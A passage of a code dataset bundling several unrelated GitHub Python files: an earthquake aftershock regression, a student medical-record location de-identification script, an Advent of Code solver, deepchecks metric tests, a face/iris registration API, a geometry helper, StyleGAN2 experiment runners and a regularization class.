séisme\n :param magmax: liste des magnitudes max par jour\n :return: les 2 coefficients de la régression et la localisation (jour) du main shock\n \"\"\"\n\n # Définition de main shock ?\n # 1) la magnitude la plus élevée\n if ms_max_mag == 1:\n idx_ms = magmax.index(max(magmax))\n # 2) Le nombre de séisme le plus élevé\n else:\n idx_ms = nt.index(max(nt))\n\n x = []\n y = []\n for i in range(idx_ms):\n if nt[i] != 0:\n y.append(np.log10(nt[i]))\n x.append(np.log10(c + i))\n [a, b] = np.polyfit(x, y, 1)\n\n return a, b, idx_ms\n\n \nif __name__ == '__main__':\n\n df = pd.read_csv('../data_SNat/CDSA_SeulementEssaimSaintes_2004-2005.txt', sep=\"\\s+\")\n\n # 1 jour = 86 400 sec\n gap = 3600 * 24\n # Calcul de p et K\n GraphOmoriUtsu(df, gap, 1, 1, 0)","repo_name":"Skaddd/GeoScience","sub_path":"Codes_Graphes/OmoriUtsu.py","file_name":"OmoriUtsu.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"5302017354","text":"import re\nimport sys\nimport locationtagger\nfrom nltk.tag import pos_tag\n\n\"\"\"\nFrank Chien\nAssignment 8 - de-identification\n10/15/21\n\nThis script adapts the phone tagger patient information de-identification algorithm.\nThe chosen category for this assignment is 'locations'.\nIn the deid_phone function, instead of calling check_for_phone this script will call check_for_location\nThe check_for_location function represents my work.\n\nInstead of the approach used in the PELR script, this assignment uses a natural language processing approach.\nThe strategy for location PHI identification is as follows\n!) use location tagger to identify locations\n2) use nltk part of speech tagging to identify proper nouns\n3) The intersect of locations and proper nouns are flagged as location PHI\n\nThe reason why proper nouns were used as a requirement is because the words such as \"home\" or \"hospital\" would\nrepresent (and correctly be tagged) as locations. However, do not offer identifiable patient information.\nLocations such as \"Calvert\" or \"Boston\" for instance would be identifiable information and are proper nouns.\n\nOne difficulty this strategy encountered was the sensitivity and specificity of the strategy relies on the performance\nof both the location tagger and the part of speech tagger. Since the input was medical documentation, which includes\nspecific language, syntax, sympbols, and abbreviations which are not seen in other domains of common English,the\nnatural language processing components had difficulty. For example, \"Aline\" was frequently tagged as a location, whereas\nphysicians/nurses would understand 'aline' as an arterial line, a piece of medical equipment. Another example is that\nsome notes were written in all-caps. The NLTK POS tagger relies on caplitalization to identify proper nouns, thus\nfor these notes, many tokens were incorrectly tagged as as 'NNP', or proper noun.\n\nIn summary, using a natural language processing approach to medical note deindification is a challenge due to the difficulty in parsing medical language with NLP tools,\nwhich can be very different syntactically and in lexicon from common English.\n\nUnfortunately, the performance of this NLP strategy as implemented is poor. Though the algorithm detected some locations correctly\n(56 true positives), the number of false positives and false negatives were great (816, and 311, respectively). A large number of\ntokens were incorrectly identified as a location (such as \"aline\") and further, incorrectly tagged as proper nouns.\nThis exercise has been a demonstration of both how medical record de-identification works, but also of the difficulty in\nanalyzing medical texts as natrual language.\n \nThe location tagger was obtained at\nhttps://pypi.org/project/locationtagger/\n\"pip install location tagger\" was run on terminal to install the location tagger\nFollowing the instructions from the website, the command \"python -m spacy download en\" was required.\nThe location tagger is maintained by kaushiksoni10 and has an open source license\nPer webiste, \"OSI approved::MIT license\"\n\nPart of speech tagging was achieved throught he NLTK tagger pos_tag. \n\n\"\"\"\n\ndef check_for_phone(patient,note,chunk, output_handle):\n #ths is the original code written by Clifford Lab\n \"\"\"\n Inputs:\n - patient: Patient Number, will be printed in each occurance of personal information found\n - note: Note Number, will be printed in each occurance of personal information found\n - chunk: one whole record of a patient\n - output_handle: an opened file handle. The results will be written to this file.\n to avoid the time intensive operation of opening and closing the file multiple times\n during the de-identification process, the file is opened beforehand and the handle is passed\n to this function. \n Logic:\n Search the entire chunk for phone number occurances. Find the location of these occurances \n relative to the start of the chunk, and output these to the output_handle file. \n If there are no occurances, only output Patient X Note Y (X and Y are passed in as inputs) in one line.\n Use the precompiled regular expression to find phones.\n \"\"\"\n # The perl code handles texts a bit differently, \n # we found that adding this offset to start and end positions would produce the same results\n offset = 27\n\n # For each new note, the first line should be Patient X Note Y and then all the personal information positions\n output_handle.write('Patient {}\\tNote {}\\n'.format(patient,note))\n\n # search the whole chunk, and find every position that matches the regular expression\n # for each one write the results: \"Start Start END\"\n # Also for debugging purposes display on the screen (and don't write to file) \n # the start, end and the actual personal information that we found\n\n\n for match in ph_reg.finditer(chunk):\n \n # debug print, 'end=\" \"' stops print() from adding a new line\n print(patient, note,end=' ')\n print((match.start()-offset),match.end()-offset, match.group())\n \n # create the string that we want to write to file ('start start end') \n result = str(match.start()-offset) + ' ' + str(match.start()-offset) +' '+ str(match.end()-offset) \n \n # write the result to one line of output\n output_handle.write(result+'\\n')\n\n\ndef check_for_location(patient,note,chunk, output_handle):\n #this is the function wrote by Frank Chien for the assignment\n #please see comment above for description of the strategy\n\n offset = 27 #identified offset required by clifford lab\n output_handle.write('Patient {}\\tNote {}\\n'.format(patient,note))\n #print(patient, note) #allows us to see how many notes the algorithm has worked through\n \n #using the location tagger \n locations = locationtagger.find_locations(text = chunk) #locationtagger returns a location object\n all_locations = locations.countries + locations.regions + locations.cities #location objects stores locations in 3 places, as countries, locations, and cities\n \n #using the NLTK part of speech tagger\n tagged_chunk = pos_tag(chunk.split()) #first split into tokens, then tag\n\n for location in all_locations: #iterates through identified locations\n for token_pos in tagged_chunk: #looks for location in list of tagged tokens. token_pos is a tuple: (token, part of speech tag)\n if location.lower() == token_pos[0].lower(): #to match location to token, only lower cases are used\n if token_pos[1]=='NNP': #if the token is a proper noun, we have identified a possible location PHI\n substring=token_pos[0] \n indices=[_.start() for _ in re.finditer(substring,chunk)] #uses a regex to identify all instances of the location within the chunk\n for start_pos in indices: #composes the result line to be written to the output file\n start_pos = start_pos - offset \n end_pos = start_pos + len(substring)\n result = str(start_pos) + ' ' + str(start_pos) + ' '+ str(end_pos)\n\n output_handle.write(result+'\\n') #writes result to output file\n\n break #break the loop and check for the next location token. The regex iterator will already obtain all instances of the location in the chunk.\n \n \n \ndef deid_phone(text_path= 'id.text', output_path = 'phone.phi'):\n \n \"\"\"\n Inputs: \n - text_path: path to the file containing patient records\n - output_path: path to the output file.\n \n Outputs:\n for each patient note, the output file will start by a line declaring the note in the format of:\n Patient X Note Y\n then for each phone number found, it will have another line in the format of:\n start start end\n where the start is the start position of the detected phone number string, and end is the detected\n end position of the string both relative to the start of the patient note.\n If there is no phone number detected in the patient note, only the first line (Patient X Note Y) is printed\n to the output\n Screen Display:\n For each phone number detected, the following information will be displayed on the screen for debugging purposes \n (these will not be written to the output file):\n start end phone_number\n where `start` is the start position of the detected phone number string, and `end` is the detected end position of the string\n both relative to the start of patient note.\n \n \"\"\"\n # start of each note has the patter: START_OF_RECORD=PATIENT||||NOTE||||\n # where PATIENT is the patient number and NOTE is the note number.\n start_of_record_pattern = '^start_of_record=(\\d+)\\|\\|\\|\\|(\\d+)\\|\\|\\|\\|$'\n\n # end of each note has the patter: ||||END_OF_RECORD\n end_of_record_pattern = '\\|\\|\\|\\|END_OF_RECORD$'\n\n # open the output file just once to save time on the time intensive IO\n with open(output_path,'w+') as output_file:\n with open(text_path) as text:\n # initilize an empty chunk. Go through the input file line by line\n # whenever we see the start_of_record pattern, note patient and note numbers and start \n # adding everything to the 'chunk' until we see the end_of_record.\n chunk = ''\n #remove later\n # counter=0\n for line in text:\n record_start = re.findall(start_of_record_pattern,line,flags=re.IGNORECASE)\n if len(record_start):\n patient, note = record_start[0]\n chunk += line\n\n # check to see if we have seen the end of one note\n record_end = re.findall(end_of_record_pattern, line,flags=re.IGNORECASE)\n\n if len(record_end):\n # Now we have a full patient note stored in `chunk`, along with patient numerb and note number\n # pass all to check_for_phone to find any phone numbers in note.\n\n #check_for_phone(patient,note,chunk.strip(), output_file)\n check_for_location(patient, note, chunk.strip(), output_file)\n # counter+=1\n # if(counter>0):\n # break\n\n #this the one we need to modify above - \n \n # initialize the chunk for the next note to be read\n chunk = ''\n\n \nif __name__== \"__main__\":\n print(sys.prefix)\n deid_phone(sys.argv[1], sys.argv[2])\n \n","repo_name":"thisishcb/BMI500_HW8_Deid_Date","sub_path":"python/deid-FrankChien.py","file_name":"deid-FrankChien.py","file_ext":"py","file_size_in_byte":10776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
+{"seq_id":"22077981767","text":"def read_data(data_path):\n \"\"\"\n Reads data\n \"\"\"\n heightmap = []\n f = open(data_path, \"r\")\n for x in f:\n heightmap.append([int(h) for h in x.strip()])\n return heightmap\n\n\ndef is_lowest(heightmap, i, j):\n \"\"\"\n Searches for lowest poi nt\n \"\"\"\n height = heightmap[i][j]\n if (j > 0) and (heightmap[i][j - 1] <= height):\n return False\n if (j < len(heightmap[i]) - 1) and (heightmap[i][j + 1] <= height):\n return False\n if (i > 0) and (heightmap[i - 1][j] <= height):\n return False\n if (i < len(heightmap) - 1) and (heightmap[i + 1][j] <= height):\n return False\n return True\n\n\ndef basin_size(hmap, i, j):\n \"\"\"\n Calculates basin size\n \"\"\"\n\n # Initialize sets and add first point\n basin = set()\n current = set()\n basin.add((i, j))\n current.add((i, j))\n new = current\n\n # Do while there are new points\n while len(new) > 0:\n new = set()\n # Look around the points in new and add them to basin and new\n for point in current:\n for [x, y] in [[1, 0], [0, 1], [-1, 0], [0, -1]]:\n if point[0] + y >= 0 and point[1] + x >= 0:\n if point[0] + y < len(hmap):\n if point[1] + x < len(hmap[point[0] + y]):\n if hmap[point[0] + y][point[1] + x] < 9:\n point_new = (point[0] + y, point[1] + x)\n if point_new not in basin:\n basin.add(point_new)\n new.add(point_new)\n # Update sets\n current = new\n return len(basin)\n\n\nif __name__ == \"__main__\":\n\n # Read data\n data_path = \"input\"\n heightmap = read_data(data_path)\n\n # Basin evaluation\n risk = 0\n basins = []\n\n for i in range(len(heightmap)):\n for j in range(len(heightmap[i])):\n if is_lowest(heightmap, i, j):\n risk += heightmap[i][j] + 1\n basins.append(basin_size(heightmap, i, j))\n\n print(f\"Total risk is {risk}\")\n basins.sort()\n print(f\"Multiplied sizes {basins[-1] * basins[-2] * basins[-3]}\")\n","repo_name":"jakuberan/AoC-2021","sub_path":"day_09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73640380524","text":"import json\nfrom functions.validate import validate_event\n\ndef validate(event, context):\n print(\"heres an event\", event)\n print(\"heres the context\", context.__dict__)\n response = validate_event(event, context)\n return response\n\ndef process(event, context):\n print(\"heres an event\", event)\n print(\"heres the context\", context.__dict__)\n return {\n \"body\": \"been processed ty\"\n }\n\ndef hello(event, context):\n body = {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"input\": event\n }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body)\n }\n\n return response\n\n # Use this code if you don't use the http event with the LAMBDA-PROXY\n # integration\n \"\"\"\n return {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"event\": event\n }\n \"\"\"\n","repo_name":"Mac-lp3/stepy","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"17299939043","text":"from hamcrest import assert_that, close_to, has_items, has_length\nfrom numpy import nanmean\n\nfrom deepchecks.vision import VisionData\nfrom deepchecks.vision.metrics_utils.detection_precision_recall import ObjectDetectionAveragePrecision\nfrom deepchecks.vision.metrics_utils.scorers import calculate_metrics\nfrom deepchecks.vision.metrics_utils.semantic_segmentation_metrics import MeanDice, MeanIoU, per_sample_dice\n\n\ndef test_default_ap_ignite_complient(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'AveragePrecision': ObjectDetectionAveragePrecision()},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n assert_that(res.keys(), has_length(1))\n assert_that(res['AveragePrecision'], has_length(80))\n\n\ndef test_ar_ignite_complient(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'AverageRecall': ObjectDetectionAveragePrecision(return_option='ar')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n\n assert_that(res.keys(), has_length(1))\n assert_that(res['AverageRecall'], has_length(80))\n\n\ndef test_equal_pycocotools(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n metric = ObjectDetectionAveragePrecision(return_option=None)\n for batch in coco_test_visiondata:\n label = coco_test_visiondata.batch_to_labels(batch)\n prediction = coco_test_visiondata.infer_on_batch(batch, mock_trained_yolov5_object_detection, device)\n metric.update((prediction, label))\n res = metric.compute()[0]\n\n assert_that(metric.get_classes_scores_at(res['precision'], area='all', max_dets=100), close_to(0.409, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], iou=0.5, area='all', max_dets=100),\n close_to(0.566, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], iou=0.75, area='all', max_dets=100),\n close_to(0.425, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='small', max_dets=100), close_to(0.212, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='medium', max_dets=100), close_to(0.383, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='large', max_dets=100), close_to(0.541, 0.001))\n\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=1), close_to(0.330, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=10), close_to(0.423, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=100), close_to(0.429, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='small', max_dets=100), close_to(0.220, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='medium', max_dets=100), close_to(0.423, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='large', max_dets=100), close_to(0.549, 0.001))\n\n # unrelated to pycoco but needed to check another param\n assert_that(metric.get_classes_scores_at(res['recall'], area='large', max_dets=100, get_mean_val=False,\n zeroed_negative=False), has_items([-1]))\n assert_that(metric.get_classes_scores_at(res['recall'], get_mean_val=False, zeroed_negative=False), has_items([-1]))\n\n\ndef test_average_precision_recall(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'ap': ObjectDetectionAveragePrecision(),\n 'ap_macro': ObjectDetectionAveragePrecision(average='macro'),\n 'ap_weighted': ObjectDetectionAveragePrecision(average='weighted')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n # classes mean and macro are not equal due to zeroed negative\n assert_that(nanmean(res['ap']), close_to(0.396, 0.001))\n assert_that(res['ap_macro'], close_to(0.409, 0.001))\n assert_that(res['ap_weighted'], close_to(0.441, 0.001))\n\n\ndef test_average_precision_thresholds(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'ap': ObjectDetectionAveragePrecision(iou_range=(0.4, 0.8, 5), average='macro')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n assert_that(res['ap'], close_to(0.514, 0.001))\n\n\ndef test_segmentation_metrics(segmentation_coco_train_visiondata, trained_segmentation_deeplabv3_mobilenet_model,\n device):\n dice_per_class = MeanDice()\n dice_micro = MeanDice(average='micro')\n dice_macro = MeanDice(average='macro')\n iou_per_class = MeanIoU()\n iou_micro = MeanIoU(average='micro')\n iou_macro = MeanIoU(average='macro')\n\n for batch in segmentation_coco_train_visiondata:\n label = segmentation_coco_train_visiondata.batch_to_labels(batch)\n prediction = segmentation_coco_train_visiondata.infer_on_batch(\n batch, trained_segmentation_deeplabv3_mobilenet_model, device)\n dice_per_class.update((prediction, label))\n dice_micro.update((prediction, label))\n dice_macro.update((prediction, label))\n iou_per_class.update((prediction, label))\n iou_micro.update((prediction, label))\n iou_macro.update((prediction, label))\n assert_that(dice_per_class.compute()[0], close_to(0.973, 0.001))\n assert_that(dice_per_class.compute(), has_length(17))\n assert_that(dice_micro.compute(), close_to(0.951, 0.001))\n assert_that(dice_macro.compute(), close_to(0.649, 0.006))\n assert_that(iou_per_class.compute()[0], close_to(0.948, 0.001))\n\n\ndef test_per_sample_dice(segmentation_coco_train_visiondata, trained_segmentation_deeplabv3_mobilenet_model, device):\n batch = next(iter(segmentation_coco_train_visiondata))\n predictions = segmentation_coco_train_visiondata.infer_on_batch(batch,\n trained_segmentation_deeplabv3_mobilenet_model,\n device)\n labels = batch[1]\n res = per_sample_dice(predictions, labels)\n assert_that(sum(res), close_to(9.513, 0.001))\n","repo_name":"cmendozab/deepchecks","sub_path":"tests/vision/utils_tests/metrics_test.py","file_name":"metrics_test.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
+{"seq_id":"4727400977","text":"from fastapi import APIRouter, Depends, status, HTTPException, UploadFile, File\nfrom fastapi.responses import HTMLResponse\nfrom sqlalchemy.orm import Session\nimport numpy as np\nimport random\nimport time\nimport cv2\nimport os\n\nfrom core.face import FaceRecognition\nfrom core.iris import IrisRecognition\nfrom core.setting import *\nfrom server import database, models\n\nfrom pydantic import BaseModel\nfrom typing import Union\n\n\n# An instance of face-recognition\ninstace_face = FaceRecognition(MODELS, METRICS)\ninstace_iris = IrisRecognition()\n\n# Set router\nrouter = APIRouter(\n tags=['Add New User'],\n prefix=\"/add\"\n)\n\n\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\nasync def add(\n name_user : str, \n face_file : UploadFile = File(description=\"Upload Face image\"),\n iris_file_1 : UploadFile = File(description=\"Upload Iris 1 image\"),\n iris_file_2 : UploadFile = File(description=\"Upload Iris 2 image\"),\n db: Session = Depends(database.get_db)\n ):\n\n\n\n # Read image contents\n try:\n face_contents = await face_file.read()\n iris_1_contents = await iris_file_1.read()\n iris_2_contents = await iris_file_2.read()\n\n # Make image format in opencv and save temporal image\n name = f'./temporal/{time.time()}_{int(random.random()*1000)}'\n\n nparr = np.fromstring(face_contents, np.uint8)\n face_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_face.png', face_img)\n\n nparr = np.fromstring(iris_1_contents, np.uint8)\n iris_1_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_iris_1.png', iris_1_img)\n\n nparr = np.fromstring(iris_2_contents, np.uint8)\n iris_2_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_iris_2.png', iris_2_img)\n except:\n return {\"detail\" : \"Error in reading data\"}\n\n # Embedding all images\n try:\n face_embed = instace_face.embedding(name+'_face.png')\n iris_1_embed = instace_iris.embedding(name+'_iris_1.png')\n iris_2_embed = instace_iris.embedding(name+'_iris_2.png')\n\n # Remove files\n os.remove(name+'_face.png')\n os.remove(name+'_iris_1.png')\n os.remove(name+'_iris_2.png')\n except:\n return {\"detail\": \"Error in embedding\"}\n\n # Add new User \n try:\n new_user = models.User(name=name_user, face=str(face_embed['Facenet']), iris_1= str(iris_1_embed), iris_2= str(iris_2_embed))\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n\n return {\"detail\" : f\"Information accepted and pushed to databse with name ({name_user})\"}\n except:\n return {\"detail\" : \"Problem in adding user to database\"}\n \n","repo_name":"mertz1999/Dual-Authentication","sub_path":"server/routers/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"}
+{"seq_id":"70520972845","text":"import numpy as np\r\nfrom shapely import LineString\r\nfrom shapely import Point\r\nfrom shapely import line_interpolate_point\r\n\r\n\r\ndef get_unit_vector(a: np.array, b: np.array) -> np.array:\r\n \"\"\"get the unit vector point in the direction point A -> point B\"\"\"\r\n vector = np.subtract(b, a)\r\n unit_v = vector / np.linalg.norm(vector)\r\n if not 0.99 < np.linalg.norm(unit_v) < 1.01:\r\n raise ValueError\r\n return unit_v[0]\r\n\r\n\r\ndef rotate_90_deg(start_point: np.array, end_point: np.array, clockwise: bool) -> np.array:\r\n \"\"\"find the coordinates of the end_point\r\n - rotated 90 degrees around the start point,\r\n - in the given direction (clockwise or counterclockwise)\r\n \"\"\"\r\n vector = np.subtract(end_point, start_point)\r\n\r\n if clockwise:\r\n rot = np.array([[0, 1], [-1, 0]])\r\n return start_point + vector @ rot\r\n else:\r\n rot = np.array([[0, -1], [1, 0]])\r\n return start_point + vector @ rot\r\n\r\n\r\nclass PlineString(LineString):\r\n\r\n def __init__(self, *args, left_clockwise=True, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n # if true, clockwise turn from the first point is left\r\n self.left_clockwise = left_clockwise\r\n\r\n def point_at_distance(self, d: float) -> Point:\r\n \"\"\"interpolate a point at a given distance of the starting point of the linestring\"\"\"\r\n point = line_interpolate_point(self, d)\r\n assert isinstance(Point, point)\r\n return point\r\n\r\n def get_perpendicular_unit_vector(self, d: float, left=True, delta=10):\r\n \"\"\"get a unit vector\r\n - locally perpendicular to the plinestring at +- delta units\r\n - at the point at distance d\r\n - in the given direction (left or right)\r\n \"\"\"\r\n\r\n # create a local segment from d to d+10 m to find the perpendicular to\r\n point = list(self.point_at_distance(d).coords)\r\n end_point = list(self.point_at_distance(d + delta).coords)\r\n\r\n if left:\r\n clockwise = self.left_clockwise\r\n else:\r\n clockwise = not self.left_clockwise\r\n\r\n # find a point in this direction\r\n new_end_point = rotate_90_deg(np.array(point), np.array(end_point), clockwise)\r\n return get_unit_vector(point, new_end_point)\r\n","repo_name":"puijterwaal/shaplien","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3522348224","text":"### this will be copied to colab\n### everything else imported\nfrom StyleGAN2TTTExperiment import StyleGAN2TTTExperiment\nimport sys\nimport os\n\nimport torch\nimport numpy as np\nimport random\n\ndef run(args):\n e = StyleGAN2TTTExperiment() \n #print(args)\n e.set_args(args)\n e.setup()\n ## SETUP\n #if args.TTT:\n if args.method == 'TNet+TTT' or args.method == 'TTTz':\n e.setup_prenetwork_ttt()\n if args.method == 'TNet+TTT' or args.method == 'TTTw':\n e.setup_prenetwork_w_ttt()\n if args.method == 'TNet+TTT' or args.method == 'TNet':\n e.setup_intranetwork_ttt()\n print('finished setup')\n\n ## TRAIN\n # may need to set train_sample_size\n if args.method == 'TNet+TTT':\n e.train_prenetwork_and_intranetwork_ttt()\n elif args.method == 'TNet':\n e.train_intranetwork_ttt()\n elif args.method == 'TTTz':\n e.train_prenetwork_ttt()\n elif args.method == 'TTTw':\n e.train_prenetwork_w_ttt()\n print('finished train')\n \n for i in range(args.n_eval_samples):\n ##comparison methods\n #if args.method in comparison_methods: #= ['normal','coachz','coachw','ttz','ttw']\n if args.method == 'normal':\n e.sample_n_stylegan_images_without_tt()\n if args.method == 'coachz':\n e.sample_n_stylegan_images_with_coachgan()\n if args.method == 'coachw':\n e.sample_n_stylegan_images_with_w_coachgan()\n if args.method == 'ttz':\n e.sample_n_stylegan_images_with_z_tt()\n if args.method == 'ttw':\n e.sample_n_stylegan_images_with_w_ttl()\n\n ## TTT and TNET \n if args.method == 'TTTz':\n e.sample_n_stylegan_images_with_prenetwork_ttt()\n if args.method == 'TTTw':\n e.sample_n_stylegan_images_with_post_w_prenetwork_ttt()\n if args.method == 'TNet':\n e.sample_n_stylegan_images_with_intranetwork_ttt()\n if args.method == 'TNet+TTT':\n e.sample_n_stylegan_images_with_pre_and_intranetwork_ttt()\n\n e.save_results(num=i*args.batch_size)\n #e.calc_metrics()\n\n#parser = argparse.ArgumentParser()\n#parser.add_argument('--TT', action='store_true', help='use TT for z')\n#parser.add_argument('--TTl', action='store_true', help='use TT-lerp for w')\n#parser.add_argument('--TTT', action='store_true', help='use TTT for z')\n#parser.add_argument('--w_TTT', action='store_true', help='use TTT for w')\n#parser.add_argument('--coach_z', action='store_true', help='use CoachGAN for z')\n#parser.add_argument('--coach_w', action='store_true', help='use CoachGAN for w')\nfrom os.path import join\nimport easydict\nargs = easydict.EasyDict()\n\nargs.repo = './stylegan2'\nsys.path.append(args.repo)\n\nimport dnnlib\nfrom dnnlib import tflib\n\ntflib.init_tf()\n\nimport metrics\n\n#comparison methods\nargs.truncation = 0.7\nargs.lr =0.00001\nargs.niter = 1000\nargs.batch_size = 2\nargs.n_eval_samples = 5000\ndatasets = ['ffhq','cat','horse','church','car']\nargs.dataset = 'church'\nargs.path ='/content/results'\n\nargs.base_exp_name='testing1000_iter_lr_00001'\nargs.size = 1024 if args.dataset == 'ffhq' else 256\nargs.checkpoint = 'stylegan2-%s-config-f.pt' % args.dataset\nargs.channel_multiplier = 2\nargs.latent = 512\nargs.n_mlp = 8\nargs.device = 'cuda'\n\n## TESTING\nmethods = ['TTTz','TTTw','TNet','TNet+TTT']\n#TTTw isn't working right now\n#methods = ['TTTw','TNet','TNet+TTT']\n#methods = ['TNet','TNet+TTT']\n#methods = ['TNet+TTT']\narchitectures = ['prelu','a','b','c','d','e','f']\n#architectures = ['c','d','e','f']\n#architectures = ['d','e','f']\nlayers = [2,4]#,8]#,16]#,32,64,128,256]\nfor m in methods:\n if m in ['TTTz','TTTw']:\n layers = [2,4,8,16,32]\n else:\n layers = [2,4]\n for arch in architectures:\n for nl in layers:\n args.nlayer = nl\n args.arch = arch\n args.method = m\n\n seed = 0\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\n np.random.seed(seed) # Numpy module.\n random.seed(seed) # Python random module.\n torch.manual_seed(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n ##\n args.arch = arch\n if args.method in ['TTTz','TTTw','TNet','TNet+TTT']:\n args.savedir = join( args.path, args.base_exp_name, args.method+args.arch+str(args.nlayer))\n else:\n args.savedir = join( args.path, args.base_exp_name, args.method)\n print(args.savedir)\n if not os.path.exists(args.savedir):\n os.makedirs(args.savedir)\n run(args)\n\n#NOTE: All comparison methods work\n# coachz and ttz give different lookin images (as expected)\ncomparison_methods = ['normal','coachz','coachw','ttz','ttw']\nfor method in comparison_methods:\n print('method:',method)\n seed = 0\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\n np.random.seed(seed) # Numpy module.\n random.seed(seed) # Python random module.\n torch.manual_seed(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n args.method = method\n args.savedir = join( args.path, args.base_exp_name, args.method)\n if not os.path.exists(args.savedir):\n os.makedirs(args.savedir)\n run(args)\n\n\nexit()\n\n## SAMPLE\n#a\\item BPF + x\n#b\\item BPF-BF + x\n#c\\item BPF-BPF$_{bottleneck}$-BF + \n#d\\item FBP + x\n#e\\item FBP-FB + x\n#f\\item FBP-F_${bottleneck}$BP-FB + \n#our methods\n#if args.train ==> train then sample\n","repo_name":"mbbrodie/stylegan2","sub_path":"run_stylegan_ttt_experiments.py","file_name":"run_stylegan_ttt_experiments.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"11703719704","text":"from __future__ import annotations\r\nimport numpy as np\r\nfrom typing import TYPE_CHECKING\r\n\r\nif TYPE_CHECKING:\r\n from autoarray.inversion.linear_obj.linear_obj import LinearObj\r\n\r\nfrom autoarray.inversion.regularization.abstract import AbstractRegularization\r\n\r\nfrom autoarray.inversion.regularization import regularization_util\r\n\r\n\r\nclass BrightnessZeroth(AbstractRegularization):\r\n def __init__(\r\n self,\r\n coefficient: float = 1.0,\r\n signal_scale: float = 1.0,\r\n ):\r\n \"\"\"\r\n An adaptive regularization scheme which applies zeroth order regularization to pixels with low expected\r\n signal values.\r\n\r\n For the weighted regularization scheme, each pixel is given an 'effective regularization weight', which is\r\n controls the degree of zeroth order regularization applied to each pixel. The motivation of this is that\r\n the exterior regions different regions of a pixelization's mesh ought to have a signal consistent with zero,\r\n but may have a low level of non-zero signal when fitting the data.\r\n\r\n To implement this regularization, values on the diagonal of the regularization matrix are increased\r\n according to the regularization weight_list of each pixel.\r\n\r\n Parameters\r\n ----------\r\n coefficient\r\n The regularization coefficient which controls the degree of zeroth order regularizaiton applied to\r\n the inversion reconstruction, in regions of low signal.\r\n signal_scale\r\n A factor which controls how rapidly the smoothness of regularization varies from high signal regions to\r\n low signal regions.\r\n \"\"\"\r\n\r\n super().__init__()\r\n\r\n self.coefficient = coefficient\r\n self.signal_scale = signal_scale\r\n\r\n def regularization_weights_from(self, linear_obj: LinearObj) -> np.ndarray:\r\n \"\"\"\r\n Returns the regularization weights of the ``BrightnessZeroth`` regularization scheme.\r\n\r\n The weights define the level of zeroth order regularization applied to every mesh parameter (typically pixels\r\n of a ``Mapper``).\r\n\r\n They are computed using an estimate of the expected signal in each pixel.\r\n\r\n Parameters\r\n ----------\r\n linear_obj\r\n The linear object (e.g. a ``Mapper``) which uses these weights when performing regularization.\r\n\r\n Returns\r\n -------\r\n The regularization weights.\r\n \"\"\"\r\n pixel_signals = linear_obj.pixel_signals_from(signal_scale=self.signal_scale)\r\n\r\n return regularization_util.brightness_zeroth_regularization_weights_from(\r\n coefficient=self.coefficient, pixel_signals=pixel_signals\r\n )\r\n\r\n def regularization_matrix_from(self, linear_obj: LinearObj) -> np.ndarray:\r\n \"\"\"\r\n Returns the regularization matrix of this regularization scheme.\r\n\r\n Parameters\r\n ----------\r\n linear_obj\r\n The linear object (e.g. a ``Mapper``) which uses this matrix to perform 